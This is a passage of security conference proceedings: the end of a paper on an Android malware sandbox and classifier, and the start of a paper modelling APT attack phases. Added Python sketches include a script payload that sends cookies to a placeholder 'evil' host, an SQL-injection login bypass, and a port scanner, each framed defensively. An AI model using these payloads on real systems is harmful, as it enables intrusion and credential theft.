the conditions to trigger these events do not arise during the
dynamic analysis process or because the malicious App is able
to detect that it is being monitored. Anti-debugging and virtual
machine detection techniques have long been used by Windows malware writers. To
make the virtual environment look like a genuine smartphone,
we made some changes to the Android emulator, e.g., we
modified IMEI, IMSI, SIM serial number, product, brand and
other information related to the phone hardware.
During dynamic analysis, the application is installed onto
the system and its activities or interactions are logged to
analyze its actions. We use a sandbox to execute the Android
application in question in a controlled virtual environment.
Figure 4 shows an overview of our dynamic analysis module. The main part of this module is based on an open
source dynamic analysis tool for Android applications named
DroidBox [22]. However, as mentioned above, we performed
some modifications in order to improve the resistance of the
emulator against detection. AndroSAT launches the emulator
through DroidBox, which uses its own modified image, making it
possible to log the system- and API-level interactions of an
Android application with the emulator. Once the emulator is up
and running, the App is installed using Android Debug Bridge
(ADB) for further analysis.

Figure 4. Overview of the dynamic analysis module

Immediately after the successful installation of the application, the module starts DroidBox to further analyze the App for a configurable interval (the default
is two minutes). Meanwhile, it automatically launches the main activity of the
installed application on the emulator, performs
random gestures on it and takes screenshots of the application using the MonkeyRunner tool [23], while DroidBox
continuously logs any system- or API-level interactions of the
application with the operating system. The following features
are collected during our dynamic analysis:
are collected during our dynamic analysis:
• File Activities: File activities consist of information regarding any file read and/or written by the application. This information includes timestamps for these file activities, the absolute paths of the accessed files, and the data written to or read from these files.
• Crypto Activities: Crypto activities consist of information regarding any cryptographic techniques used by the application. This includes the type of operation performed (e.g., key generation, encryption, and decryption), the algorithms used (e.g., AES, DES), the key used, and the data involved.
• Network Activities: These unveil the connections opened by the application and the packets sent and received, with detailed information about each activity, including the timestamp, source, destination and ports.
• Dex Class Initialized: In Android, an application can initialize a dex file that is not a part of its own package. In the most malicious case, an application can download a dex file to the Android device and then execute it using the DexClassLoader. This way, the application under analysis will come out clean, which makes it almost impossible for a malware analyzer or sandbox to detect the malicious activities performed by the application. DroidBox logs the relevant details whenever an application initializes any dex class.
• Broadcast Receiver: As explained earlier, the use of a broadcast receiver helps improve the user experience of an application. However, an attacker can use this functionality to easily gain access to private or critical data without raising an alarm in the user's mind. We log information regarding any broadcast receiver used by the application and record the name of the broadcast and the corresponding action.
• Started Services: Services play a very critical role in Android applications. They are used to execute code in the background without raising an alarm. Started services provide information about any service that is started or initialized during the runtime of the application.
• Bypassed Permissions: This lists the names of the permissions bypassed by the application. It aims to detect scenarios where an application can perform a task that needs a specific permission without explicitly using that permission. For example, an Android application can direct the browser to open a webpage without even using the Internet permission [24].
• Information Leakage: Information leakage can occur through files, SMS and the network. Leakage occurs through a file if the application writes or reads any confidential information (e.g., IMEI, IMSI, and phone number) of an Android device to or from a file; the absolute path of the file, timestamp, operation (read or write), information type and data involved are logged. Leakage occurs through SMS if the information is sent in a text message; the timestamp, the phone number to which the information is sent, the information type, and the data involved are logged. Leakage occurs through the network if the application sends critical data over the Internet; the timestamp, destination, port used, information type and data involved are recorded.
• Sent SMS: If an Android application tries to send a text message, the timestamp, phone number and contents of the text message are logged.
• Phone Call: If an Android application tries to make a phone call, the timestamp and phone number are recorded.
The dynamic analysis module logs all these features into a text file, which is then sent to the parser module to remove any redundant data. The extracted relevant information is then saved in XML and PDF formats.
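The install-and-exercise loop described above can be sketched as follows. This is a simplified sketch, not AndroSAT's driver: it uses the stock `adb` and `monkey` tools as stand-ins for the DroidBox/MonkeyRunner pipeline, and assumes an emulator is already running.

```python
def analysis_commands(apk_path: str, package: str, events: int = 200):
    """Return the shell commands for one dynamic-analysis run:
    install the App, exercise it with random gestures, then remove it."""
    return [
        ["adb", "install", "-r", apk_path],
        # `monkey` injects pseudo-random gestures into the App under test;
        # --throttle adds a delay (ms) between events.
        ["adb", "shell", "monkey", "-p", package, "--throttle", "500", str(events)],
        ["adb", "uninstall", package],
    ]

def run_analysis(apk_path: str, package: str):
    """Execute the commands (requires adb and a running emulator)."""
    import subprocess
    for cmd in analysis_commands(apk_path, package):
        subprocess.run(cmd, check=True)
```

In the real pipeline, log collection runs concurrently with the gesture injection, and the emulator image is restored to a clean snapshot between Apps.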
V. EVALUATION
The reports generated by our framework contain useful information regarding the analyzed Android applications,
which in turn can be used in many Android security related
applications. To confirm the effectiveness of our proposed
framework, we analyzed a total of 1932 Android applications,
out of which 970 are benign and 962 are malicious. We
collected the malicious samples from the Android Malware
Genome Project [25] and from another third party. The benign
samples were obtained from F-Droid [5], which is a Free
and Open Source Software (FOSS) repository for Android
applications. We also verified that the applications collected from
F-Droid are benign using VirusTotal [26].
Results from the dynamic analysis show that 254 out of 962
(i.e., 26%) malicious applications, and none of the 970 benign
applications, led to private data leakage through the network.
Many malware writers use cryptographic techniques to hide
the malicious payload in order to make it impossible for a
signature-based malware analyzer to understand the malicious
intentions of an application. Among the analyzed Apps, 41
out of 962 malicious applications and 2 out of 970 benign
applications use cryptography at runtime. The experimental
results also suggest that an Android application with different
versions might have different package contents and hence
the checksum of the packages might differ. However, the
checksum of the classes.dex file of some different versions came
out to be the same. This tells us that malware writers might
add junk data in the APK package to make an application look
different while the content of classes.dex file remains the same.
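The classes.dex checksum comparison mentioned above can be reproduced with a few lines of code. A minimal sketch, assuming the APK is a standard zip archive with a top-level classes.dex entry:

```python
import hashlib
import zipfile

def dex_checksum(apk_path) -> str:
    """SHA-256 of the classes.dex entry inside an APK (a zip archive).
    Two APK versions whose package checksums differ but whose
    classes.dex digests match carry the same bytecode."""
    with zipfile.ZipFile(apk_path) as apk:
        return hashlib.sha256(apk.read("classes.dex")).hexdigest()
```

Comparing this digest across versions of the "same" App quickly exposes repackaged samples padded with junk resources.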
We used the reports generated by our framework
to perform three case studies, namely frequency analysis of the
different permissions and operations used by Android Apps,
cyber-intelligence gathering, and classification.
A. Frequency analysis of Android permissions and dynamic
operations
Figure 5(a) shows the top 15 permissions used by the
analyzed malicious applications and their frequency as compared to the benign ones. It is interesting to find out that
some permissions are used by most of the malicious applications. As depicted in Figure 5(a), the READ_PHONE_STATE
permission is used by ≈86% of the malicious Apps as
compared to ≈12% of the benign Apps. This permission
is most widely used to obtain system specific data such as
IMEI, IMSI, phone number and SIM serial. Similarly, the
frequencies of use of INTERNET, ACCESS_WIFI_STATE, ACCESS_NETWORK_STATE, READ_SMS, and WRITE_SMS
show noticeable differences. Figure 5(b) shows the top 15
permissions used by the analyzed benign applications and their
frequency as compared to the analyzed malicious applications.
In total, the 962 malicious applications used 10,203 permissions,
which comes to an average of 10.6 permissions per application.
On the other hand, the 970 benign applications used 3,838 permissions, which comes to an average of around 3.95 permissions
per application. These results confirm that, on average, the
number of permissions requested by a benign application is
less than the number of permissions requested by a malicious
application.
Figure 5(c) shows the top 15 dynamic operations performed by the analyzed malicious applications. As shown
in the figure, there are many operations that are predominantly performed by the malicious applications. These include BroadcastReceiver(BOOT_COMPLETED), OpenNetworkConnection:80, and DataLeak Network. Applications
with malicious intent use the BOOT_COMPLETED broadcast
receiver to receive a notification whenever an Android device
boots up so that they can perform the intended malicious
activity or launch malicious services that keep running in the
background. Another deciding factor is data leakage through
network, which has a high occurrence in our malicious dataset,
i.e., 254 as compared to 0 in the analyzed benign ones. Figure
129
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Figure 5. Most frequently used permissions and dynamic operations for the analyzed Apps
5(d) shows the top 15 dynamic operations performed by the
benign applications in our dataset.
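The per-permission frequency analysis behind Figure 5 can be sketched as follows. A minimal illustration that, given per-App permission lists, computes the percentage of Apps requesting each permission; the input format here is an assumption, not AndroSAT's report schema.

```python
from collections import Counter

def permission_frequencies(reports):
    """Given a list of per-App permission lists, return (permission, percent)
    pairs sorted most-frequent first. Each App is counted at most once
    per permission."""
    counts = Counter()
    for perms in reports:
        counts.update(set(perms))
    total = len(reports)
    return sorted(((p, 100.0 * c / total) for p, c in counts.items()),
                  key=lambda pc: -pc[1])
```

Running this separately over the malicious and benign report sets and comparing the two rankings yields exactly the kind of side-by-side comparison shown in Figures 5(a) and 5(b).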
B. Cyber-intelligence
One of the main objectives of cyber-intelligence is to track
sources of online threats. In this work, we used the URLs and
IP addresses recorded during the static and dynamic analysis
of malware Apps to produce a graphical representation of the
geographical locations of possible malicious servers (and their
ISPs) that communicate with these malicious Apps. Figure 6
shows a sample output of this analysis (IP addresses are not
shown for privacy and liability concerns).
Figure 6. Geographical presentation of the locations of suspected IPs
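The aggregation step behind this analysis can be sketched as follows. A minimal sketch that extracts IPv4 addresses from report text and maps each address to the Apps that contacted it; the subsequent geolocation could be performed with an offline database such as MaxMind's GeoLite (not shown here).

```python
import re
from collections import defaultdict

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def ips_per_app(reports):
    """Map each IP address found in the analysis reports to the set of
    Apps that contacted it. IPs shared by many malicious Apps are good
    candidates for geolocation and further investigation."""
    hits = defaultdict(set)
    for app_name, report_text in reports.items():
        for ip in IPV4_RE.findall(report_text):
            hits[ip].add(app_name)
    return hits
```

Sorting the result by the number of Apps per IP surfaces the servers most likely to be part of a command-and-control infrastructure.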
C. Malware detection
Throughout this experiment, we incorporated 134 static,
285 dynamic and 400 n-grams based features. We performed
our classification task on 1932 Android applications using
different combinations of these features, namely static analysis
features, dynamic analysis features, n-grams based features,
combination of static & dynamic features (S+D), combination
of static & n-grams based features (S+N) and combination of
dynamic & n-grams based features (D+N). We also combined
features from all three analysis techniques, i.e., static, dynamic
and n-grams (S+D+N) and performed feature space reduction
using classwise document frequency to obtain a feature-set
containing the top features for classification. We employed five
different algorithms supported by WEKA [27] for classification
with 10-fold cross-validation: SMO [28], IBK [28], J48 [28],
AdaBoost1(J48 as base classifier) [28], and RandomForest
[28]. Our experimental results show that AdaBoost1 and
RandomForest models achieve better accuracy compared to
the other models. Figure 7 shows the results obtained for
the five different feature sets in terms of accuracy, precision,
and recall. From Figure 7(a), it is clear that n-gram features
using AdaBoost1, D+N features using AdaBoost1 and S+D+N
features using RandomForest provide the highest accuracy
of ≈98%. Figure 7(b) and Figure 7(c) show the corresponding
precision and recall, respectively. The low accuracy obtained
when using dynamic analysis only can be explained by noting
that, throughout our dynamic analysis process, we do not
interact with the applications with carefully chosen gestures.
Consequently, there is no guarantee that we check complete
paths that can be traversed by the application or even a
good portion of it. Furthermore, the short dynamic analysis
interval might not be enough to trigger some of the bad events
performed by malicious Apps. On the other hand, it should
be noted that the relatively high accuracy obtained with the
combined features should also be interpreted with care since
it might have resulted because of the limited variance in the
characteristics of the analyzed samples.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
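The combine-and-cross-validate procedure described above can be sketched as follows. This is a hypothetical NumPy analogue, not the paper's WEKA pipeline: the 134/285/400 feature counts mirror the paper's split, but the data are synthetic and the classifier is a simple nearest-centroid rule standing in for AdaBoost1/RandomForest.

```python
# Hypothetical sketch (the paper used WEKA; this is a minimal NumPy analogue):
# concatenate static, dynamic, and n-gram feature blocks (S+D+N) and
# estimate accuracy with 10-fold cross-validation of a nearest-centroid rule.
import numpy as np

rng = np.random.default_rng(0)
n_apps = 200  # stand-in for the paper's 1932 applications

# Synthetic feature blocks mirroring the paper's 134/285/400 split;
# malicious samples are shifted so the toy classes are separable.
labels = rng.integers(0, 2, n_apps)  # 0 = benign, 1 = malicious
static_f = rng.random((n_apps, 134)) + labels[:, None]
dynamic_f = rng.random((n_apps, 285)) + labels[:, None]
ngram_f = rng.random((n_apps, 400)) + labels[:, None]

sdn = np.hstack([static_f, dynamic_f, ngram_f])  # the S+D+N feature set

def nearest_centroid_cv(X, y, folds=10):
    """10-fold CV accuracy of a nearest-centroid classifier."""
    idx = np.arange(len(y))
    accs = []
    for f in range(folds):
        test = idx % folds == f
        train = ~test
        c0 = X[train & (y == 0)].mean(axis=0)  # benign centroid
        c1 = X[train & (y == 1)].mean(axis=0)  # malicious centroid
        pred = (np.linalg.norm(X[test] - c1, axis=1)
                < np.linalg.norm(X[test] - c0, axis=1)).astype(int)
        accs.append((pred == y[test]).mean())
    return float(np.mean(accs))

print(round(nearest_centroid_cv(sdn, labels), 3))
```

The same loop applies unchanged to any of the single or pairwise feature sets (S, D, N, S+D, S+N, D+N) by changing which blocks are stacked.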
Figure 7. The classification results
VI. CONCLUSION
The increasing popularity of the Android operating system
has led to a sudden escalation in Android malware. In this work,
we developed a framework to analyze Android applications
using static and dynamic analysis techniques (AndroSAT). The
effectiveness of AndroSAT was tested by analyzing a dataset of
1932 applications. The information obtained from the produced
analysis reports proved to be very useful in many Android
security related applications. In particular, we used the data
in these reports to perform three case studies: analyzing the
frequency of use of different Android permissions and dynamic
operations for both malicious and benign Apps, producing
cyber-intelligence information, and malware detection. The
implemented prototype can be further extended to allow for
more useful add-ons that can be used to provide further
investigation of the security of Android applications.
REFERENCES
[1] “Third Annual Mobile Threats Report,” 2013, URL: http://www.juniper.net/us/en/local/pdf/additional-resources/3rd-jnpr-mobile-threats-report-exec-summary.pdf [accessed: 2014-09-05].
[2] Q. Li and G. Clark, “Mobile security: a look ahead,” Security & Privacy, IEEE, vol. 11, no. 1, 2013, pp. 78–81.
[3] C. Miller, “Mobile attacks and defense,” Security & Privacy, IEEE, vol. 9, no. 4, 2011, pp. 68–70.
[4] “Kaspersky: forget lone hackers, mobile malware is serious business,” Feb. 2014, URL: http://www.theguardian.com/technology/2014/feb/26/kaspersky-android-malware-banking-trojans [accessed: 2014-09-05].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[5] “Android Permissions,” URL: http://developer.android.com/reference/android/Manifest.permission.html [accessed: 2014-09-05].
[6] T. Blasing, L. Batyuk, A. D. Schmidt, S. A. Camtepe, and S. Albayrak,
“An android application sandbox system for suspicious software detection,” in Proceedings of the 5th international conference on Malicious
and unwanted software (MALWARE). IEEE, 2010, pp. 55–62.
[7] D. J. Wu, C. H. Mao, T. E. Wei, H. M. Lee, and K. P. Wu, “Droidmat:
Android malware detection through manifest and api calls tracing,”
in Proceedings of the Seventh Asia Joint Conference on Information
Security (Asia JCIS). IEEE, 2012, pp. 62–69.
[8] A. Reina, A. Fattori, and L. Cavallaro, “A system call-centric analysis
and stimulation technique to automatically reconstruct android malware
behaviors,” EuroSec, Apr. 2013.
[9] I. Burguera, U. Zurutuza, and S. Nadjm-Tehrani, “Crowdroid: behavior-based malware detection system for android,” in Proceedings of the 1st
ACM workshop on Security and privacy in smartphones and mobile
devices. ACM, 2011, pp. 15–26.
[10] Y. Zhou, Z. Wang, W. Zhou, and X. Jiang, “Hey, you, get off of my
market: Detecting malicious apps in official and alternative android
markets.” in NDSS, 2012.
[11] M. Spreitzenbarth, F. Freiling, F. Echtler, T. Schreck, and J. Hoffmann,
“Mobile-sandbox: having a deeper look into android applications,”
in Proceedings of the 28th Annual ACM Symposium on Applied
Computing. ACM, 2013, pp. 1808–1815.
[12] M. Alazab, V. Monsamy, L. Batten, P. Lantz, and R. Tian, “Analysis of
malicious and benign android applications,” in Proceedings of the 32nd
International Conference on Distributed Computing Systems Workshops
(ICDCSW). IEEE, 2012, pp. 608–616.
[13] W. Enck, P. Gilbert, B. G. Chun, L. P. Cox, J. Jung, P. McDaniel,
and A. N. Sheth, “Taintdroid: an information flow tracking system for
real-time privacy monitoring on smartphones,” Communications of the
ACM, vol. 57, no. 3, 2014, pp. 99–106.
[14] S. Jain and Y. K. Meena, “Byte level n–gram analysis for malware
detection,” in Computer Networks and Intelligent Computing. Springer,
2011, pp. 51–59.
[15] D. K. S. Reddy and A. K. Pujari, “N-gram analysis for computer virus
detection,” Journal in Computer Virology, vol. 2, no. 3, 2006, pp. 231–
239.
[16] “Android version history,” URL: http://en.wikipedia.org/wiki/Android_version_history [accessed: 2014-09-05].
[17] S. Brahler, “Analysis of the android architecture,” Karlsruhe Institute of Technology, 2010.
[18] “The Android Asset Packaging Tool,” URL: http://developer.android.com/tools/building/index.html [accessed: 2014-09-05].
[19] “Android APKTool: A tool for reverse engineering Android apk files,” URL: https://code.google.com/p/android-apktool/ [accessed: 2014-09-05].
[20] “Apk2java: Batch file to automate apk decompilation process,” URL:
http://code.google.com/p/apk2java/ [accessed: 2014-09-05].
[21] “Android Broadcast Receiver,” URL: http://developer.android.com/reference/android/content/BroadcastReceiver.html [accessed: 2014-09-05].
[22] “DroidBox: Android Application Sandbox,” URL: https://code.google.com/p/droidbox/ [accessed: 2014-09-05].
[23] “MonkeyRunner,” URL: http://developer.android.com/tools/help/monkeyrunner_concepts.html [accessed: 2014-09-05].
[24] A. Lineberry, D. L. Richardson, and T. Wyatt, “These aren’t the
Permissions you’re Looking for,” in DEFCON 18, Las Vegas, NV, 2010.
[25] Y. Zhou and X. Jiang, “Dissecting android malware: Characterization
and evolution,” in Proceedings of the 2012 IEEE Symposium on
Security and Privacy (SP). IEEE, 2012, pp. 95–109.
[26] “VirusTotal,” URL: https://www.virustotal.com/ [accessed: 2014-09-05].
[27] “WEKA,” URL: http://www.cs.waikato.ac.nz/ml/weka/ [accessed:
2014-09-05].
[28] I. H. Witten and E. Frank, Data Mining: Practical machine learning
tools and techniques. Morgan Kaufmann, 2005.
Involvers’ Behavior-based Modeling in Cyber Targeted Attack
Youngsoo Kim and Ikkyun Kim
Cyber Security Research Laboratory
Electronics & Telecommunications Research Institute
Daejeon, Korea
e-mail: {blitzkrieg, ikkim21}@etri.re.kr
Abstract— Cyber targeted attacks use sophisticated techniques
and malware to exploit vulnerabilities in systems, while an
external command and control server continuously monitors
and extracts data from a specific target. Since this attack
process operates continuously and uses diverse malicious
codes and attack routes, it is considered difficult to detect
in advance. In this paper, we categorize cyber targeted
attacks into four steps and define potential behaviors of
involvers, such as attackers and victims, in order to build a model.
Each behavior of our model can include several methods.
Furthermore, we apply our behavior-based model to two real
targeted attacks, the “3.20 South Korean Malware Attack” and
“The Targeted Attack for SK Communications”.
Keywords-APT; Targeted Attacks; Behavior-based Modeling;
Malicious Codes; 3.20 DarkSeoul.
I. INTRODUCTION
Cyber targeted attack, also known as Advanced
Persistent Threat (APT), is an intelligent attack
method whose goal is to acquire classified information or
control of critical infrastructure by penetrating the networks of
targets in a stealthy way and staying there for the long term. It
usually targets organizations or nations for business or
political motives. It employs complicated techniques that use
malicious codes to take advantage of vulnerabilities in
systems, while an outer command and control server constantly
observes and derives data from a specific target [1]. This
attack method works continuously and utilizes
various malwares and attack routes, so it is deemed
hard to discover beforehand. In Section 2, we classify
advanced persistent threats and describe possible behaviors
of involvers, such as attackers and victims, for modeling. Each
behavior of our model can include several methods. In
Section 3, we introduce a couple of real targeted attacks,
show that our behavior-based model is fit to depict them,
and describe some useful cases of the proposed modeling map.
We conclude with some remarks and further work in
Section 4.
II. EACH STEP OF BEHAVIORS/METHODS FOR CYBER TARGETED ATTACKS
Cyber targeted attacks can be divided into four phases: the
preparation phase, the penetration phase, the control phase,
and the achievement phase. Figure 1 depicts the detailed
behaviors of attackers and victims.
In the preparation phase, attackers collect and analyze
diverse data about the target web sites, and they hack servers
with vulnerabilities and turn them into Command and Control
(C&C) servers. They also use various ways of triggering
downloads of malicious codes. In the penetration phase,
attackers try to acquire user authority using diverse methods,
and users' Personal Computers (PCs) can be infected with
malicious codes by running malicious attached files,
updating falsified software, or using unauthorized USBs. In
the control phase, attackers try to acquire additional user
authorities and collect additional information in various
ways. They can also control victimized systems with
backdoors or web-shells and spread malicious codes to all
connected devices. In the achievement phase, attackers can
acquire critical information using remote commands or web-mails,
and they can also incapacitate systems using automatic
termination or remote starting.
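The four-phase model just outlined can be sketched as a small data structure. This is a hypothetical illustration, not the paper's implementation: the phase names come from the text, while the behavior strings are abbreviated paraphrases of the behaviors described in this section.

```python
# Hypothetical sketch of the four-phase behavior model described above:
# each phase maps to example involver behaviors, and an observed behavior
# can be mapped back to its phase (as in the paper's mapping maps).
PHASES = {
    "preparation": ["collect target data", "set up C&C server",
                    "prepare malicious-code downloads"],
    "penetration": ["acquire user authority", "infect user PC"],
    "control": ["acquire additional authority", "collect information",
                "install backdoor or web-shell", "spread malicious code"],
    "achievement": ["exfiltrate critical information", "destroy systems"],
}

def phase_of(behavior):
    """Return the phase an observed behavior belongs to, or None."""
    for phase, behaviors in PHASES.items():
        if behavior in behaviors:
            return phase
    return None

print(phase_of("install backdoor or web-shell"))  # control
```

Mapping observed behaviors back to phases in this way is what makes partially observed attacks classifiable, which Section III exercises on real incidents.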
A. The Preparation Phase
Once attackers decide on their targets, they visit the targets'
web pages to look for vulnerabilities [2]. They can
acquire user information by falsifying URLs of the targets. First,
they register on the target website and try to read web-board
messages that require a higher-level access authority.
Even though access is rejected, they can see the URL of the
web-board message they want to read by right-clicking
with the mouse. They then try to falsify that
URL to acquire user information without read authority.
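The URL-falsification weakness described above is an instance of an insecure direct object reference. The sketch below is a hypothetical illustration (the message store, user names, and handler functions are invented for the example): the vulnerable handler trusts whatever message id appears in the URL, while the fixed handler checks read authority first.

```python
# Hypothetical sketch of the URL-falsification (insecure direct object
# reference) weakness: tampering with the id in a URL exposes a message
# the user has no authority to read unless the server checks ownership.
MESSAGES = {
    101: {"owner": "alice", "body": "public note"},
    102: {"owner": "admin", "body": "restricted memo"},
}

def read_message_vulnerable(user, msg_id):
    # Serves any message whose id the attacker tampers into the URL.
    return MESSAGES[msg_id]["body"]

def read_message_fixed(user, msg_id):
    # Authorization check: only the owner (or an admin) may read.
    msg = MESSAGES[msg_id]
    if user != msg["owner"] and user != "admin":
        raise PermissionError("no read authority for this message")
    return msg["body"]

print(read_message_vulnerable("mallory", 102))  # leaks the restricted memo
```

The fix is the server-side ownership check; hiding or obfuscating the URL alone does not help, since the attacker can enumerate ids.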
They can collect and analyze information related to
the targeted victims using web-crawlers or bots, which look
through enormous numbers of web pages, including sites providing
Social Network Services (SNS), such as Facebook, Twitter,
etc. They can also use meta-search engines, which connect
diverse search engines, for the same purpose.
Attackers hack servers (e.g., web-board, web-mail server,
and web-disk) with vulnerabilities and make them C&C
servers. After they acquire authorities of accessing the
targeting servers using malicious codes, they falsify them to
play a role of the C&C servers.
After that, attackers prepare to induce the victims to
download malicious codes in diverse ways. They can send
e-mails with attached malicious codes to targeted users
or attach them to web-board messages to trigger
downloads. They can also falsify the software on updating
servers; if they succeed, users unknowingly download
and install the falsified updating software.
They can use Cross Site Scripting (XSS) vulnerabilities in two
Figure 1. Each Step Behaviors/Methods for Cyber Targeted Attacks
ways, i.e., Stored XSS and Reflected XSS. Attackers can
insert malicious scripts into web-board messages using an XSS
vulnerability of the targets to trigger infection by
malicious scripts. After they find the XSS vulnerability, they
write web-board messages with malicious scripts and post
those messages on the web-board [3]. They can also send users
e-mails containing URL links to targeted web sites that host
malicious scripts. After they find the XSS vulnerability of the
targeted web sites, they write e-mail messages including URL
links with malicious scripts and send them to the targeted
users, who become infected by clicking those URL links.
Sometimes, they prepare USB sticks containing malicious
codes and leave them somewhere in the targeted area [4].
Attackers can also replace the attached files of unwritten
web-mails with malicious files, using IDs/passwords of
web-mail accounts collected in advance. After they collect
many ID/password pairs, they check unwritten web-mails
using the collected credentials and replace the attached
files with malicious files.
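The stored-XSS path above hinges on the web-board rendering user-supplied message content verbatim. The sketch below is a hypothetical illustration (the payload string and page templates are invented): rendering the message without escaping would let the injected script run in a victim's browser, while HTML-escaping renders the payload inert.

```python
# Hypothetical sketch of the stored-XSS weakness: an unescaped web-board
# message carries an executable script, an escaped one is plain text.
import html

# Invented payload of the kind described in the text: it would ship the
# victim's cookies to an attacker-controlled host if executed.
message = "<script>document.location='http://evil/?c='+document.cookie</script>"

unsafe_page = "<div>%s</div>" % message              # script would execute
safe_page = "<div>%s</div>" % html.escape(message)   # payload neutralized

print("<script>" in unsafe_page)  # True
print("<script>" in safe_page)    # False
```

Output escaping at render time is the standard stored-XSS countermeasure; input filtering alone tends to be bypassable.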
B. The Penetration Phase
After preparing, attackers try to acquire user authority
using diverse methods, such as URL falsification, weak
passwords, command injection, or SQL injection. They
acquire user authority by falsifying the URL of the targeted web
site. First, they check the pattern of the URL attributes of the
targets and repeatedly access those web sites by typing
randomly changed URL links. They can log in and acquire
user authorities if randomized user-codes are matched.
Sometimes, attackers acquire weak passwords using
password-cracking tools. Additionally, they can run local system
commands remotely because of the vulnerability of
insufficiently authorized input variables [5]. First, they check
the address of the targeted web site. After injecting a system
command into this address, they can access it with the
changed address, and then they can see and obtain some
system information. Finally, attackers can watch, falsify,
or delete database data by fabricating the input data of a database
application [6]. This occurs when database applications do not
check the validity of input data from users. They can
bypass the authentication process for users or administrators using
SQL injection. After checking whether they can input special
characters into the log-in window, they input SQL commands into
the log-in window and then become able to log in without
authentication.
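The log-in bypass just described can be demonstrated with a minimal, self-contained sketch (the table, credentials, and payload are invented for the example): a query built by string formatting lets the classic `' OR '1'='1` payload defeat the check, while a parameterized query treats the same payload as ordinary data.

```python
# Hypothetical sketch of the SQL-injection log-in bypass described above,
# using an in-memory SQLite database.
import sqlite3

db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (name TEXT, pw TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def login_vulnerable(name, pw):
    # String-built SQL: attacker input becomes part of the query text.
    q = "SELECT COUNT(*) FROM users WHERE name = '%s' AND pw = '%s'" % (name, pw)
    return db.execute(q).fetchone()[0] > 0

def login_fixed(name, pw):
    # Parameterized query: input is bound as data, never parsed as SQL.
    q = "SELECT COUNT(*) FROM users WHERE name = ? AND pw = ?"
    return db.execute(q, (name, pw)).fetchone()[0] > 0

payload = "' OR '1'='1"
print(login_vulnerable("admin", payload))  # True: authentication bypassed
print(login_fixed("admin", payload))       # False: payload treated as data
```

The injected condition turns the WHERE clause into `(name='admin' AND pw='') OR '1'='1'`, which matches every row, so the vulnerable check passes without any valid password.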
User PCs can be infected with malicious codes in various
ways. A user who runs the attached files of received e-mails
containing malicious codes becomes infected: when a
user receives an e-mail with malicious attachments, he reads the
message of that e-mail, and if he then opens the malicious
attachments, he becomes infected. Similarly, if a user runs
malicious files attached to web-board messages, he becomes
infected: when a user clicks a message on a web-hard,
web-server, or web-board with malicious attachments, he
runs the attached malicious files and, as a result, becomes
infected. Furthermore, a user can be infected through the
automatic activation of updating software falsified in
advance: updating software that has been falsified in
advance is executed automatically, and if the user activates the
updating process, or automatic updates are activated, the
user's PC is infected. A user can also be infected by reading a
web-board message containing malicious scripts: after
accessing the web, a user reads a web-board message with
malicious scripts, the contents of the web-board message
including the malicious scripts are sent to the user, the
user's PC is infected, and the user's cookies are sent to
the attacker. Sometimes, if a user receives an e-mail
with a malicious URL link and accesses that URL link, he
can be infected by malicious scripts: he receives an
e-mail including a malicious URL link and clicks that link;
as a result, he accesses a link with a malicious script,
and the user's PC is infected when the malicious script is
activated; finally, the user's cookies are sent to the attacker.
Local systems can also be infected by bringing in and using
infected unauthorized USB sticks: if a user brings infected
unauthorized USB sticks and plugs them into local systems
such as PCs or servers, the local systems are infected. A user
can also be infected by running a falsified attached file of a
web-mail: if a user logs in to his web-mail account and opens
an attached file falsified by an attacker in advance,
his PC is infected by the executed attachment.
C. The Control Phase
To achieve their final goals, attackers try to acquire additional
user authorities by exploiting weaknesses of shared folders or
using key-loggers, and they collect additional information in
various ways, such as port scanning, weak points of Network Access
Control (NAC), vulnerabilities of applications, etc.
Furthermore, they can control victimized systems by
installing backdoors or uploading web-shells, and spread
malicious codes to all connected devices by falsifying the
updating servers or web servers of the targets.
Attackers can access a shared PC if the ID/password
pair of the infected PC is the same as that of the shared
PC. After that, they can access the agent server at a given time
if they install a scheduler, such as at.exe, on the shared PC. If
they log in with the ID/password pair of the infected PC, they
try to access the shared PC using the same pair; if the
pair matches, they gain access. If they install a scheduler
on the shared PC, they can access the agent server at a given time.
Additionally, all keyboard-typing logs on infected PCs can
be recorded in real-time using key-loggers. First, attackers
install a key-logging program on the infected PCs. If users make
use of the infected PCs, the key-logging program records all
keyboard-typing logs in real-time. After receiving the recorded
logging data, attackers examine them and obtain some
ID/password pairs.
Attackers can get additional information by analyzing
vulnerabilities of various web applications, such as SQL
injection, file upload, XSS, path traversal, cookies, parameter
manipulation, configuration errors, admin pages,
backup/temporary files, etc. Attackers can also collect
additional information by finding unencrypted folders or
files on infected PCs: after logging in to the infected PCs, they
search all folders and files, and if they find unencrypted ones,
they can extract additional information. Sometimes, attackers
find vulnerabilities in the NAC by checking security policies or
security solutions, and can then access the local network
without authority checks. They find vulnerabilities in the NAC
by checking security policies or security solutions in order to
access the targeted local network, and can then access
servers and check data to obtain information. Attackers
can access the infected PCs and scan all ports to check
whether they are open or not: they access the infected PCs
and check open ports using the nmap command or port-scanning
tools. They can also check the status of the local network,
for example, whether some PCs are grouped or some devices
are powered off, using scanners such as nbtscan, nbtstat, etc.
Additionally, attackers harvest target information related to
their final goals: they access the admin computer handling
local information and find and harvest the target information.
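The port-scanning step above, reduced to its core, is a series of TCP connection attempts. The sketch below is a hypothetical illustration of an nmap-style connect scan (host and port list are placeholders), not a reimplementation of any tool named in the text.

```python
# Hypothetical sketch of a TCP connect scan (the essence of the nmap-style
# port checking described above): try to connect and record open ports.
import socket

def scan_ports(host, ports, timeout=0.5):
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            # connect_ex returns 0 when the TCP handshake succeeds (port open)
            if s.connect_ex((host, port)) == 0:
                open_ports.append(port)
    return open_ports

# Example: probe a few well-known ports on the local host.
print(scan_ports("127.0.0.1", [22, 80, 443]))
```

A real scanner adds concurrency, service fingerprinting, and non-connect probe types, but the open/closed decision is this same handshake test.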
Attackers can hide backdoor files in advance and obtain
root authority by activating them to control the target
system [7]. First, they access the infected PCs and create
backdoor files, which are compiled in a temp directory.
When they run the backdoor files from a general account, they
get root authority and become able to control the target
system. Attackers can also control the targeted system by
installing terminal programs for remote control and database
access tools after finding PCs that operate 24 hours a day.
First, they find PCs operating 24 hours a day, and they install
